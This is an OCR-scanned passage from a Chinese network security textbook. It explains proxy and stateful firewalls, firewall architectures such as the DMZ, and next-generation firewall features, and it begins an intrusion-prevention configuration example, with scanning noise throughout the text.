时 ,服务 器 就 不 用 重复 地 获取 相同 的 内 容 , 直 接 将 缓存 内 容 发 出 即 可 , 既 节约 了 时 间 也 节约 
了 网 络 资源 。 

代理 服务 器 通常 运行 在 两 个 网 络 之 间 , 它 对 于 客户 来 说 像 是 一 台 真 的 服务 器 ,而 对 于 外 
界 的 服务 器 来 说 , 它 又 是 一 台 客 户 机 ,其 工作 原理 如 图 4-2 所 示 。 从 图 中 可 以 看 出 ,代理 服 
务 器 作为 内 部 网 络 客户 端的 服务 器 ,拦截 所 有 客户 端 要 求 , 也 向 客户 端 转发 响应 ; 代理 客户 
负责 代表 内 部 客户 端 向 外 部 服务 器 发 出 请 求 ,当然 也 向 代理 服务 器 转发 响应 。 代 理 服 务 器 
会 像 一 堵 墙 一 样 挡 在 内 部 用 户 和 外 界 之 间 , 从 外 部 只 能 看 到 该 代理 服务 器 而 无 法 获知 任何 
的 内 部 资源 。 

(1) 应 用 级 网 关 防 火 墙 。 应 用 级 网 关 防 火 墙 是 指 在 网 关上 执行 一 些 特定 的 应 用 程序 和 
服务 程序 ,实现 协议 过 滤 和 转发 功能 , 它 工作 在 OSI 模型 的 应 用 层 , 且 针对 特定 的 应 用 层 协 
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图 4-2 代理 的 工作 机 制 


议 。 其 核心 技术 是 代理 服务 器 技术 , 它 是 基于 软件 的 ,通常 安装 在 专用 的 服务 器 或 工作 站 系 
统 上 。 它 适用 于 特定 的 互联 网 服务 ,如 超 文 本 传输 (HTTP) 和 远程 文件 传输 (FTP) 等 。 

应 用 级 网 关 的 优势 在 于 它 授予 网 络 管理 员 对 每 一 个 服务 的 完全 控制 权 , 代 理 服务 限制 
了 命令 集合 和 内 部 主机 支持 的 服务 。 同 时 ,网 络 管理 员 对 支持 的 服务 可 以 完全 控制 。 另 外 ， 
应 用 级 网 关 安 全 性 较 好 ,支持 强 的 用 户 认证 ,提供 详细 的 日 志 信息 以 及 较 包 过 滤 路 由 器 更 易 
于 配置 和 测试 的 过 滤 规 则 。 应 用 级 网 关 防 火 墙 的 最 大 的 局 限 性 是 它 需 要 用 户 或 者 改变 其 性 
能 ,或 者 在 需要 访问 代理 服务 的 系统 上 安装 特殊 的 软件 ,此 外 速度 相对 比较 慢 。 

(2) 电路 级 网 关 防 火 墙 。 另 一 种 类 型 的 代理 技术 称 为 电路 级 网 关 。 在 电路 级 网 关中 ， 
数据 包 被 提交 至 用 户 应 用 层 处 理 。 电 路 级 网 关 用 来 在 两 个 通信 的 终点 之 间 转 换 包 。 

电路 级 网 关 工 作 在 会 话 层 。 在 两 主机 首次 建立 TCP 连接 时 创立 一 个 电子 屏障 。 它 作 
为 服务 器 接收 外 来 请 求 ,并 转发 请 求 ,与 被 保护 的 主机 连接 时 则 担当 客户 机 角色 ,起 代理 服 
务 的 作用 。 它 监视 两 主机 建立 连接 时 的 握手 信息 是 否 合乎 逻辑 ,确认 信号 有 效 后 网 关 仅 复 
制 、 传 递 数据 ,而 不 进行 过 滤 。 电 路 级 网 关中 特殊 的 客户 程序 只 在 初次 连接 时 进行 安全 协商 
控制 ,其 后 就 透明 了 。 只 有 懂得 如 何 与 该 电路 网 关 通 信 的 客户 机 才能 到 达 防 火 墙 另 一 边 的 
服务 器 。 

电路 级 网 关 防 火 墙 的 特点 是 将 所 有 跨越 防火 墙 的 网 络 通信 和 链 路 分 为 两 段 。 防 火 墙 内 外 
计算 机 系统 间 应 用 层 的 “链接 ”, 由 两 个 终止 代理 服务 器 上 的 “链接 ”来 实现 ,外 部 计算 机 的 网 
络 链 路 只 能 到 达 代 理 服 务 器 ,从 而 起 到 了 隔离 防火 墙 内 外 计算 机 系统 的 作用 。 此 外 ,代理 服 
务 也 对 过 往 的 数据 包 进 行 分 析 、 注 册 登 记 , 形 成 报告 ,同时 当 发 现 被 攻击 迹象 时 会 向 网 络 管 
理 员 发 出 警报 ,并 保留 攻击 痕迹 。 

电路 级 网 关 常 用 于 向 外 连接 ,这 时 网 络 管理 员 对 其 内 部 用 户 是 信任 的 。 电 路 级 网 关 防 
火 墙 可 以 被 设置 成 混合 网 关 , 对 内 连接 支持 应 用 层 或 代理 服务 ,而 对 外 连接 支持 电路 级 功 
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能 。 这 样 使 得 防火 墙 系统 对 于 要 访问 Internet 服务 的 内 部 用 户 来 说 使 用 起 来 很 方便 ,由 于 
连接 似乎 是 起 源 于 防火 墙 ,因而 既 可 以 隐藏 受 保护 网 络 的 有 关 信 息 , 又 能 提供 保护 内 部 网 络 
免 于 外 部 攻击 的 防火 墙 功能 。 

代理 技术 的 优点 首先 是 易于 配置 。 因 为 代理 是 一 个 软件 ,所 以 它 较 过 滤 路 由 器 更 易 配 
置 。 其 次 ,代理 能 生成 各 项 记录 。 因 代理 工作 在 应 用 层 , 它 检查 各 项 数据 ,可 生成 各 项 日 志 、 
记录 ,也 可 以 用 于 记 费 等 应 用 。 再 次 ,代理 能 灵活 、 完 全 地 控制 进出 流量 和 内 容 , 能 过 滤 数 据 
内 容 以 及 能 为 用 户 提供 透明 的 加 密 机 制 。 最 后 ,代理 还 可 以 方便 地 与 其 他 安全 手段 集成 。 

代理 技术 的 缺点 首先 是 其 速度 较 路 由 器 慢 , 且 对 用 户 不 透明 。 其 次 ,对 于 每 项 服务 , 代 
理 可 能 要 求 不 同 的 服务 器 。 还 有 代理 服务 不 能 保证 免 受 所 有 协议 弱点 的 限制 。 再 次 ,代理 
取决 于 在 客户 端 和 真实 服务 器 之 间 搬 入 代理 服务 器 的 能 力 , 这 要 求 两 者 之 间 交 流 的 相对 直 
接 , 而 且 有 些 服 务 的 代理 是 相当 复杂 的 。 最 后 ,代理 不 能 改进 底层 协议 的 安全 性 。 

3) 状态 检测 防火 墙 

状态 检测 防火 墙 的 工作 原理 是 它 的 安全 特性 非常 好 ,其 采用 了 一 个 在 网 关上 执行 网 络 
安全 策略 的 软件 引擎 , 称 之 为 检测 模块 。 检 测 模块 在 不 影响 网 络 正常 工作 的 前 提 下 ,采用 抽 
取 相 关 数 据 的 方法 对 网 络 通信 的 各 层 实施 监测 ,抽取 部 分 数据 , 即 状态 信息 ,并 动态 地 保存 
起 来 作为 以 后 制定 安全 决策 的 参考 。 

状态 检测 防火 墙 的 优点 首先 是 检测 模块 支持 多 种 协议 和 应 用 程序 ,并 可 以 很 容易 地 实 
现 应 用 和 服务 的 扩充 ; 其 次 , 它 可 以 检测 RPC 和 UDP 之 类 的 端口 信息 ,而 包 过 滤 和 代理 网 
关 都 不 支持 此 类 端口 ; 最 后 ,状态 防火 墙 的 性 能 非常 坚固 。 

状态 检测 防火 墙 的 缺点 是 配置 非常 复杂 ,而 且 会 降低 网 络 的 速度 。 

2. 按 组 成 结构 分 类 

目前 普遍 的 防火 墙 按 组 成 结构 可 分 为 以 下 3 种。 

(1) 软件 防火 墙 。 软 件 防 火 墙 运行 于 特定 的 计算 机 上 , 它 需 要 客户 预先 安装 好 的 计算 
机 操作 系统 的 支持 ,一 般 来 说 ,这 台 计 算 机 就 是 整个 内 部 网 络 的 网 关 。 软 件 防火 墙 就 像 其 他 
的 软件 产品 一 样 需要 先 在 计算 机 上 安装 并 做 好 配置 才 可 以 使 用 。 

(2) 硬件 防火 墙 。 这 里 所 说 的 硬件 防火 墙 是 针对 芯片 级 防火 墙 来 说 的 。 它 们 最 大 的 差 
别 在 于 是 否 基于 专用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防火 墙 都 是 这 种 所 谓 的 硬件 防火 墙 ， 
它们 都 基于 PC 架构 ,就 是 说 ,它们 和 普通 的 家 庭 用 的 PC 没有 太 大 区 别 。 在 这 些 PC 架构 
计算 机 上 运行 一 些 经 过 裁剪 和 简化 的 操作 系统 ,最 常用 的 有 UNIX、Linux 和 FreeBSD 

(3) 芯片 级 防火 墙 。 基 于 专门 的 硬件 平台 ,核心 部 分 就 是 ASIC 芯片 ,所 有 的 功能 都 集 
成 在 芯片 上 。 专 有 的 ASIC 芯片 促使 它们 比 其 他 种 类 的 防火 墙 速度 更 快 , 处 理 能 力 更 强 , 性 
能 更 高 。 

由 于 软件 防火 墙 和 硬件 防火 墙 的 结构 是 运行 于 一 定 的 操作 系统 之 上 的 ,就 决定 了 它 的 
功能 是 可 以 随 着 客户 的 实际 需要 而 做 相应 调整 的 ,这 一 点 比较 灵活 。 从 性 能 上 来 说 ,多 添加 
一 个 扩展 功能 就 会 对 防火 墙 处 理 数据 的 性 能 产生 影响 ,添加 的 扩展 功能 越 多 ,防火墙 的 性 能 
就 下 降 得 越 快 。 

软件 防火 墙 和 硬件 防火 墙 的 安全 性 在 很 大 程度 上 取决 于 操作 系统 自身 的 安全 性 。 无 论 
是 UNIX、Linux 还 是 Windows 系统 ,都 或 多 或 少 存在 漏洞 ,一旦 被 人 取得 了 控制 权 , 将 可 
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以 随意 修改 防火 墙 上 的 策略 和 访问 权限 ,进入 内 网 进行 任意 破坏 ,危及 内 网 的 安全 。 芯 片 
级 防火 墙 不 存在 这 个 问题 ,自身 有 很 好 的 安全 保护 ,所 以 较 其 他 类 型 的 防火 墙 安 全 性 高 
一 些 

芯片 级 防火 墙 专 有 的 ASIC 芯片 ,促使 它们 比 其 他 种 类 的 防火 墙 速度 更 快 ,处 理 能 力 更 
强 。 专 用 硬件 和 软件 的 结合 提供 了 线 速 处 理 、 深 层次 信息 包 检查 .坚固 的 加 密 、 复 杂 内 容 和 
行为 扫描 功能 的 优化 等 ,不 会 在 网 络 流量 的 处 理 上 出 现 瓶 颈 。 目 前 使 用 芯片 级 防火 墙 技术 
成 为 实现 千 兆 万 至 万 兆 防 火 墙 的 主要 选择 。 

3. 按 部 署 位 置 分 类 

防火 墙 按 在 网 络 中 部 署 位 置 的 不 同 来 划分 ,可 分 为 边界 防火 墙 , 个 人 防火 墙 和 混合 式 防 
火 墙 。 

(1) 边界 防火 墙 。 边 界 防 火 墙 位 于 内 外 网 络 的 边界 ,所 起 的 作用 是 对 内 、 外 网 络 实施 隔 
离 ,保护 边界 内 部 网 络 。 这 类 防火 墙 一般 都 是 硬件 类 型 的 ,价格 昂贵 ,性 能 较 好 。 

(2) 个 人 防火 墙 。 个 人 防火 墙 安装 于 单 台 主机 中 ,防御 的 也 只 是 单 台 主机 。 这 类 防火 
墙 应 用 于 广大 的 个 人 用 户 , 即 为 软件 防火 墙 ,价格 最 便宜 ,性 能 也 最 差 。 

(3) 混合 式 防火 墙 。 混 合式 防火 墙 也 称 * 分 布 式 防火 墙 ”, 它 是 一 整套 防火 墙 系 统 ,由 若 
干 软 \ 硬 件 组 成 ,分 布 于 内 、 外 网 络 边 界 和 内 部 各 主机 之 间 , 既 对 内 、 外 网 络 之 间 数 据 流 进行 
过 滤 ,又 对 网 络 内 部 各 主机 之 间 的 通信 进行 过 滤 。 其 性 能 最 好 ,价格 也 最 贵 。 


4.1.3 防火 墙 体系 结构 


目前 ,防火 墙 的 防御 体系 结构 主要 有 双 宿 /多 宿主 机 防火 墙 、. 屏 项 主机 防火 墙 和 屏蔽 子 
网 防火 墙 3 种 。 

1. 双 宿 /多 宿主 机 防火 墙 

双 宿 /多 宿主 机 防火 墙 (Dual-Homed/Multi-Homed Firewall) 又 称 为 双 宿 /多 宿 网 关 防 
火 墙 。 它 是 一 种 拥有 两 个 或 多 个 连接 到 不 同 网 络 上 的 网 络 接口 的 防火 墙 ,通常 用 一 台 装 有 
两 块 或 多 块 网 卡 的 保 人 又 主机 做 防火 墙 , 两 块 或 多 块 网 卡 各 自 与 受 保 护 网 和 外 部 网 相连 ,其 体 
系 结构 如 图 4-3 所 示 。 这 里 的 堡垒 主机 是 一 种 被 强化 的 可 以 防御 攻击 的 计算 机 ,被 暴露 于 
Internet 之 上 ,作为 进入 内 部 网 络 的 一 个 检查 点 ,以 便 将 整个 网 络 的 安全 问题 集中 在 某 个 主 
机 上 解决 ,从 而 省 时 省 力 ,不 用 考虑 其 他 主机 的 安全 的 目的 。 可 以 看 出 ,堡垒 主机 是 网 络 中 
最 容易 受到 侵害 的 主机 ,所 以 堡垒 主机 也 必须 是 自身 保护 最 完善 的 主机 。 








图 4-3 双 宿 /多 宿主 机 防火 增 体系 结 构 


148 网 络 安 全 教程 与 实践 (第 2 版 ) 





双 宿 /多 宿主 机 防火 墙 的 特点 是 主机 的 路 由 功能 是 被 禁止 的 ,两 个 网 络 之 间 的 通信 通过 
应 用 层 代 理 服 务 来 完成 。 堡 又 主机 的 系统 软件 可 用 于 维护 系统 日 志 、 硬 件 复制 日 志 或 远程 
日 志 。 这 对 于 日 后 的 检查 非常 有 用 ,但 这 不 能 帮助 网 络 管理 者 确认 内 网 中 哪些 主机 可 能 已 
被 黑客 入侵 ,一 旦 人 侵 者 侵入 堡垒 主机 并 使 其 只 具有 路 由 功能 , 则 任何 网 上 用 户 均 可 以 随便 
访问 内 部 网 络 。 

2. 屏蔽 主机 防火 墙 

屏蔽 主机 防火 墙 易于 实现 也 很 安全 ,因此 应 用 广泛 。 如 图 4-4 所 示 ,屏蔽 主机 网 关 包 括 
一 个 分 组 过 滤 路 由 器 连接 外 部 网 络 ,同时 一 个 堡 侄 主机 安装 在 内 部 网 络 上 ,通常 在 路 由 器 上 
设立 过 滤 规 则 ,并 使 这 个 堡垒 主机 成 为 从 外 部 网 络 唯一 可 直接 到 达 的 主机 ,这 确保 了 内 部 网 
络 不 受 未 被 授权 的 外 部 用 户 的 攻击 。 


工作 站 工作 站 。 服务 器 | 屏 项 主机 路 由 器 | 


| 


图 4-4 屏蔽 主机 防火 墙 体系 结构 








在 屏蔽 的 路 由 器 上 的 数据 包 过 滤 是 按 这 样 一 种 方法 设置 的 : 堡 公主 机 是 Internet 的 主 
机 能 连接 到 内 部 网 络 系统 的 桥梁 (例如 ,传送 进来 的 电子 邮件 )。 即 使 这 样 ,也 仅 有 某 些 确定 
类 型 的 连接 被 允许 。 任 何 外 部 的 系统 试图 访问 内 部 的 系统 或 服务 将 必须 连接 到 这 台 堡 公主 
机 上 。 因 此 ,堡垒 主机 需要 拥有 高 等 级 的 安全 性 。 

数据 包 过 滤 也 允许 堡 公主 机 开放 可 人 允许 的 连接 (对 于 * 可 人 允许 ”的 界定 将 由 用 户 站 点 的 
安全 策略 决定 ) 到 外 部 世界 。 在 屏蔽 的 路 由 器 中 数据 包 过 滤 配 置 可 以 按 下 列 方式 之 一 执行 : 

(1) 允许 其 他 的 内 部 主机 为 了 得 到 某 些 服务 与 Internet 上 的 主机 连接 ( 即 允 许 那 些 已 
经 有 数据 包 过 滤 的 服务 ) 。 

(2) 不 允许 来 自 内 部 主机 的 所 有 连接 (强迫 那些 主机 经 由 堡垒 主机 使 用 代理 服务 ) 。 

用 户 可 以 针对 不 同 的 服务 混合 使 用 这 些 手 段 , 某 些 服务 可 以 被 允许 直接 经 由 数据 包 过 
滤 , 而 其 他 服务 可 以 被 允许 仅仅 间接 地 经 过 代理 。 这 完全 取决 于 用 户 实行 的 安全 策略 。 如 
果 受 保护 网 络 是 一 个 虚拟 扩展 的 本 地 网 , 即 没有 子 网 和 路 由 器 ,那么 内 网 的 变化 不 影响 堡垒 
主机 和 屏蔽 路 由 器 的 配置 。 和 危险 区 域 上 只 限制 在 堡垒 主机 和 屏蔽 路 由 器 。 网 关 的 基本 控制 策 
略 由 安装 在 上 面 的 软件 决定 。 如 果 攻 击 者 设法 登录 到 网 关上 面 , 内 网 中 的 其 余 主 机 就 会 受 
到 很 大 威胁 。 这 与 双 宿 主机 防火 墙 受 攻击 时 的 情形 相似 。 


3. 屏蔽 子 网 防火 墙 
这 种 类 型 的 防火 墙 是 在 内 部 网 络 和 外 部 网 络 之 间 建 立 一 个 被 隔离 的 子 网 ,用 两 台 分 组 
过 滤 路 由 器 将 这 一 子 网 分 别 与 内 部 网 络 和 外 部 网 络 分 开 。 在 很 多 实现 过 程 中 ,两 个 分 组 过 
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滤 路 由 器 放 在 子 网 的 两 端 ,在 子 网 内 构成 一 个 隔离 区 (DeMilitarised Zone,DMZ) ,如 图 4-5 
所 示 。 

内 部 网 络 和 外 部 网 络 均 可 访问 被 屏蔽 子 网 ,但 禁止 它们 穿 过 被 屏蔽 子 网 通信 ，, 像 
WWW 和 FTP 服务 器 可 放 在 DMZ 中 。 有 的 屏蔽 子 网 中 还 设 有 一 台 堡 从 主机 作为 唯一 可 
访问 点 ,支持 终端 交互 或 作为 应 用 网 关 代 理 。 这 种 配置 的 危险 带 仅 包括 堡垒 主机 、 子 网 主机 
及 所 有 连接 内 网 、 外 网 和 屏蔽 子 网 的 路 由 器 。 


工作 站 工作 站 ”服务 器 


* 
2 时 内 网 路 由 器 


工作 站 服务 器 





yg | 外 网 路 由 器 
1 
1 


图 4-5 屏蔽 子 网 防火 墙 体系 结构 


在 实际 应 用 中 建造 防火 墙 时 ,一 般 很 少 采 用 单一 的 技术 ,通常 采用 多 种 解决 不 同 问题 的 
技术 的 组 合 。 应 该 根据 所 购买 防火 墙 软件 的 要 求 .硬件 环境 所 能 提供 的 支持 ,综合 考虑 选用 
最 合适 的 防火 墙 体系 结构 ,最 大 限度 地 发 挥 防火 墙 软件 的 功能 ,实现 对 信息 的 安全 保护 。 


4.1.4 新 一 代 防 火 墙 技术 


防火 墙 产品 经 历 了 基于 路 由 器 的 防火 墙 \ 用 户 化 的 防火 墙 、 建 立 在 通用 操作 系统 上 的 防 
火 墙 和 具有 安全 操作 系统 的 防火 墙 4 个 阶段 。 随 着 防火 墙 产 品 的 发 展 , 防 火 墙 产品 的 功能 
也 越 来 越 强大 ,逐渐 将 网 关 与 安全 系统 合 二 为 一 ,而 实现 防火 墙 的 技术 和 方式 也 多 种 多 样 ， 
目前 新 一 代 防 火 墙 主要 有 下 列 技术 及 实现 方式 。 

(1) 双 端 口 或 三 端口 的 结构 。 新 一 代 防 火 墙 具有 两 个 或 3 个 独立 的 网 卡 ,内 外 两 个 网 
卡 可 不 作 IP 转化 而 串 接 于 内 部 网 与 外 部 网 之 间 , 另 一 个 网 卡 可 专用 于 对 服务 器 的 安全 
保护 。 

(2) 网 络 地 址 转换 技术 (Network Address Translate, NAT)。NAT 是 一 种 用 于 把 内 部 
IP 地 址 转换 成 外 部 的 IP 地 址 的 技术 。 例 如 使 用 的 电话 总 机 , 当 不 同 的 内 部 网 络 向 外 连接 
时 使 用 相同 的 一 个 或 几 个 IP 地 址 (总 机 号 码 ); 而 内 部 网 络 互相 通信 时 则 使 用 内 部 IP 地 址 
(分 机 号 码 )。 这 样 ,两 个 IP 地 址 就 不 会 发 生 冲 突 。 

新 一 代 防 火 墙 利 用 NAT 技术 能 透明 地 对 所 有 内 部 地 址 作 转 换 , 使 外 部 网 络 无 法 了 解 
内 部 网 络 的 结构 ,同时 允许 内 部 网 络 使 用 自己 的 IP 地 址 和 专用 网 络 。 表 4-1 的 地 址 作为 保 
留 地 址 , 供 私 网 使 用 。 防 火 墙 能 详尽 记录 每 一 个 主机 的 通信 ,确保 每 个 分 组 被 送 往 正确 的 
地 址 。 

(3) 灵活 的 代理 系统 。 代 理 系 统 是 一 种 将 信息 从 防火 墙 的 一 侧 传 送 到 另 一 侧 的 软件 模 
块 。 新 一 代 防 火 墙 采 用 了 两 种 代理 机 制 : 一 种 用 于 代理 从 内 部 网 络 到 外 部 网 络 的 连接 , 另 
一 种 用 于 代理 从 外 部 网 络 到 内 部 网 络 的 连接 。 前 者 采用 NAT 技术 来 解决 ,后 者 采用 非 保 
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密 的 用 户 定制 代理 或 保密 的 代理 系统 技术 来 解决 。 











表 4-1 保留 地 址 
防火 墙 类 别 保留 地 址 
A 类 10. 0. 0.0 一 10. 255. 255. 255 
B 类 172. 16. 0. 0 一 172. 31. 255. 255 
C 类 192. 166. 0. 0~192. 166. 255. 255 





(4) 多 级 过 滤 技术 。 为 保证 系统 的 安全 性 和 防御 水 平 , 新 一 代 防 火 墙 采用 了 三 级 过 滤 
措施 ,并 辅 以 鉴别 手段 。 在 分 组 过 滤 一 级 ,能 过 滤 掉 所 有 的 源 路 由 分 组 和 假冒 的 IP 源 地 址 ; 
在 应 用 网 关 一 级 ,能 利用 FTP、SMTP 等 各 种 网 关 , 控 制 和 检测 Internet 提供 的 所 有 通用 服务 ; 
在 电路 网 关 一 级 ,实现 内 部 主机 与 外 部 站 点 的 透明 连接 ,并 对 服务 的 通行 实行 严格 控制 。 

(5) Internet 网 关 技术 。 由 于 是 直接 串 连 在 网 络 之 中 ,新 一 代 防 火 墙 必须 支持 用 户 在 
Internet 互联 的 所 有 服务 ,同时 还 要 防止 与 Internet 服务 有 关 的 安全 漏洞 。 故 它 要 能 以 多 种 安 
全 的 应 用 服务 器 (包括 FTP、Finger、Mail、Telnet .News 和 WWW 等 ) 来 实现 网 关 功 能 。 

在 域名 服务 方面 ,新 一 代 防 火 墙 采用 两 种 独立 的 域名 服务 器 : 一 种 是 内 部 DNS 服务 
器 ,主要 处 理 内 部 网 络 的 DNS 信息 ; 另 一 种 是 外 部 DNS 服务 器 ,专门 用 于 处 理 机 构 内 部 向 
Internet 提供 的 部 分 DNS 信息 。 

在 匿名 FTP 方面 ,服务 器 只 提供 对 有 限 的 受 保护 的 部 分 目录 的 只 读 访 问 。 在 WWW 
服务 器 中 ,只 支持 静态 的 网 页 ,而 不 允许 图 形 或 CGI 代码 等 在 防火 墙 内 运行 。 在 Finger 服 
务 器 中 ,对 外 部 访问 ,防火墙 只 提供 可 由 内 部 用 户 配置 的 基本 的 文本 信息 ,而 不 提供 任何 与 
攻击 有 关 的 系统 信息 。SMTP 与 POP 邮件 服务 器 要 对 所 有 进 、 出 防火 墙 的 邮件 作 处 理 , 并 
利用 邮件 映射 与 标 头 剥 除 的 方法 隐 去 内 部 的 邮件 环境 , Telnet 服务 器 对 用 户 连接 的 识别 做 
专门 处 理 ,网 络 新 闻 服 务 则 为 接收 来 自 ISP 的 新 闻 开 设 了 专门 的 磁盘 空间 。 

(6) 安全 服务 器 网 络 (SSN)。 为 适应 越 来 越 多 的 用 户 在 向 Internet 上 提供 服务 时 对 服 
务 器 保护 的 需要 ,新 一 代 防 火 墙 采用 分 别 保护 的 策略 ,保护 对 外 服务 器 。 它 利用 一 张 网 卡 将 
对 外 服务 器 作为 一 个 独立 网 络 处 理 , 对 外 服务 器 既是 内 部 网 的 一 部 分 ,又 与 内 部 网 关 完 全 隔 
离 。 这 就 是 安全 服务 器 网 络 (Security Server Network.,SSN) 技 术 。 对 SSN 上 的 主机 既 可 
单独 管理 ,也 可 设置 成 通过 FTP .Telnet 等 方式 从 内 部 网 上 管理 。 

SSN 的 方法 提供 的 安全 性 要 比 传统 的 隔离 区 (Demilitarized Zone,DMZ) 方 法 好 得 多 ， 
因为 SSN 与 外 部 网 之 间 有 防火 墙 保护 ,SSN 与 内 部 网 之 间 也 有 防火 墙 的 保护 ,而 DMZ 只 
是 一 种 在 内 、 外 部 网 络 网 关 之 间 存 在 的 一 种 防火 墙 方式 。 一 旦 SSN 受 破坏 ,内 部 网 络 仍 会 
处 于 防火 墙 的 保护 之 下 ,而 一 旦 DMZ 受到 破坏 ,内 部 网 络 便 暴 露 于 攻击 之 下 。 

(7) 用 户 鉴别 与 加 密 。 新 一 代 防 火 墙 采用 一 次 性 使 用 的 口令 字 系 统 来 作为 鉴别 用 户 的 
手段 ,并 实现 了 对 邮件 的 加 密 。 

(8) 用 户 定制 服务 。 为 满足 特定 用 户 的 特定 需求 ,新 一 代 防 火 墙 在 提供 众多 服务 的 同 
时 ,还 为 用 户 定制 提供 支持 ,这 类 选项 有 通用 TCP、 出 站 UDP、FTP 以 及 SMTP 等 类 ,如 果 
某 一 用 户 需 要 建立 一 个 数据 库 的 代理 , 便 可 利用 这 些 支持 ,方便 地 设置 。 

(9) 审计 和 告警 。 新 一 代 防 火 墙 产品 的 审计 和 告警 功能 十 分 健全 ,日 志文 件 包括 一 般 
信息 .内核 信息 .核心 信 息 、 接 收 邮件 .邮件 路 径 、 发 送 邮件 .连接 需求 .已 鉴别 的 访问 .告警 条 


第 4 章 防火 墙 与 入 侵 防御 151 





件 、 管 理 日 志 、 进 站 代理 .FTP 代理 .出 站 代理 .邮件 服务 器 和 域名 服务 器 等 。 告 警 功能 会 守 
住 每 一 个 TCP 或 UDP 探寻 ,并 能 以 发 出 邮件 .声响 等 多 种 方式 报警 。 


4.2 ”防火墙 安全 配置 实例 


4.2.1 配置 入 侵 防 御 功 能 


防火 墙 配置 人 侵 防 御 功 能 的 目的 是 保护 企业 内 网 用 户 和 Web 服务 器 避免 受到 来 自 
Internet 的 攻击 。 

如 图 4-6 所 示 , 某 企业 在 网 络 边界 处 部 署 了 FW 作为 安全 网 关 。 在 该 组 网 中 ,内 网 用 户 
可 以 访问 内 网 FTP 服务 器 和 Internet 的 Web 服务 器 ; 内 网 的 FTP 服务 器 向 内 网 用 户 和 
Internet 用 户 提 供 服务 。 
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图 4-6 入 侵 防御 组 网 图 


该 企业 需要 在 FW 上 配置 入 侵 防 御 功 能 ,具体 要 求 如 下 : 

(1) 企业 经 常 受到 蠕虫 .木马 和 僵尸 网 络 的 攻击 ,必须 对 以 上 攻击 进行 防范 。 

(2) 保护 内 网 用 户 : 避免 内 网 用 户 访问 Internet 的 Web 服务 器 时 受到 攻击 。 例 如 , 含 
有 恶意 代码 的 网 站 对 内 网 用 户 发 起 攻击 。 

(3) 保护 内 部 网 络 的 FTP 服务 器 : 防范 Internet 用 户 和 内 网 用 户 对 内 部 网 络 的 FTP 
服务 器 发 起 攻击 。 

(4) 通过 长 期 的 日 志 观察 和 调研 发 现 有 一 种 攻击 出 现 次数 较 多 ,其 匹配 的 签名 ID 为 
74320, 需 将 这 种 攻击 全 部 阻 断 。 

1. 数据 规划 

针对 企业 的 具体 要 求 分 析 入 侵 防御 功能 的 配置 信息 如 下 : 

(1) 该 企业 主要 防范 对 象 为 网 络 常见 的 蠕虫 .木马 和 僵尸 网 络 的 攻击 ,而 这 些 攻击 在 签 
名 中 定义 的 严重 级 别 均 为 高 。 

(2) 保护 内 网 用 户 : 在 Trust 到 Untrust 域 间 创建 安全 策略 。 攻 击 行为 是 由 于 内 网 用 
户 访 问 Internet 的 Web 服务 器 引起 的 , 且 攻 击 对 象 是 作为 客户 端的 内 网 用 户 ,可 配置 签名 
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过 滤器 的 协议 为 HTTP, 对 象 为 "客户 端 ”, 严 重 性 为 “高 ”。 


保护 内 网 用 户 的 安全 策略 表 如 表 4-2 所 示 。 


(3) 保护 内 部 网 络 的 FTP 服务 器 : 在 Untrust 到 DMZ 域 间 以 及 Trust 到 DMZ 域 间 分 


别 创建 安全 策略 。 


(4) 由 于 这 些 攻击 行为 的 攻击 对 象 都 是 FTP 服务 器 ,可 配置 签名 过 滤器 的 协议 为 
FTP, 对 象 为 “服务 端 ", 严 重 性 为 “高 "。 将 ID 为 74320 的 签名 引入 例外 签名 中 ,并 设置 动作 
为 “ 阻 断 ”。 保护 内 网 FTP 服务 器 的 安全 策略 表 如 表 4-3 所 示 。 


表 4-2 保护 内 网 用 户 的 安全 策略 表 


表 4-3 保护 内 网 FTP 服务 器 的 安全 策略 表 










































































名 称 policy_sec_1 名 称 policy_sec 2 
源 安全 区 域 Trust 源 安全 区 域 Trust, Untrust 
目的 安全 区 域 Untrust 目的 安全 区 域 DMZ 
源 地 址 /地 区 10. 3. 0. 0/24 司 的 池 关 /六 区 02 O24 
服务 FTP 
服务 HTTP 动作 元 许 
动作 允许 入 侵 防 御 profile_ips_server 
入 侵 防 御 profile_ips_pc profile_ips_server 中 的 签名 过 滤器 
profile_ips_pe 中 的 签名 过 滤器 和 和 
名 称 filterl 严重 性 高 
对 象 客户 端 协议 FTP 
严重 性 高 profile_ips_server 中 的 例外 签名 
签名 ID 74320 
协议 HTTP 动作 间断 
2. 配置 思路 


(1) 配置 接口 IP 地 址 和 安全 区 域 ,完成 网 络 基 本 参数 配置 。 


(2) 配置 入 侵 防御 配置 文件 profile_ips_pc, 保 护 内 网 用 户 。 通 过 配置 签名 过 滤器 来 满 
足 安全 需要 。 

(3) 配置 人 侵 防御 配置 文件 profile_ips_server, 保护 内 网 服务 器 。 并 配置 签名 过 滤器 
以 及 例外 签名 来 满足 安全 需要 。 

(4) 创建 安全 策略 policy_sec_1 ,并 引用 安全 配置 文件 profile_ips_pc, 保 护 内 网 用 户 免 
受 来 自 Internet 的 攻击 。 

(5) 创建 安全 策略 policy_sec_2, 并 引用 安全 配置 文件 profile_ips_server, 保 护 内 网 服 
务 器 免 受 来 自 内 网 用 户 和 Internet 的 攻击 。 

3. 操作 步骤 

(1) 配置 接口 IP 地 址 和 安全 区 域 , 完 成 网 络 基本 参数 配置 。 

选择 “网 络 ”| “接口 "。 单 击 GE1/0/1 接口 对 应 的 编辑 按钮 国 , 按 (安全 区 域 : Untrust; 
IP 地 址 : 1.1. 1.1. 1/24) 参 数 配置 ; 单 击 GE1/0/2 接口 对 应 的 国 . 按 (安全 区 域 : DMZ; IP 
地 址 : 10. 2.0. 1/24) 参 数 配置 ; 单 击 GE1/0/3 接口 对 应 的 国 , 按 (安全 区 域 : Trust; IP 地 
址 : 10. 3. 0. 1/24) 参 数 配 置 。 
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(2) 创建 入 侵 防御 配置 文件 profile_ips_pc, 配 置 签名 过 滤器 。 
选择 “对 象 "| 安全 配置 文件 "|* 入 侵 防 御 ”。 在 “入 侵 防御 配置 文件 "中 , 单 击 * 新 建 ", 如 
4-7 所 示 配 置 参数 后 单 击 “确定 ”按钮 ,完成 入侵 防御 配置 文件 的 配置 。 














名 profile_ips_pc 3 
项 壕 profle for intranet users 
双击 取证 口 记 | 。。” 栓 W8 卫 络 威 队 后 ， 系统 会 在 设备 中 攻取 包含 放 络 流 时 威胁 特 证 码 扑救 据 世 ， 可 以 在 日 志 中 查看 该 
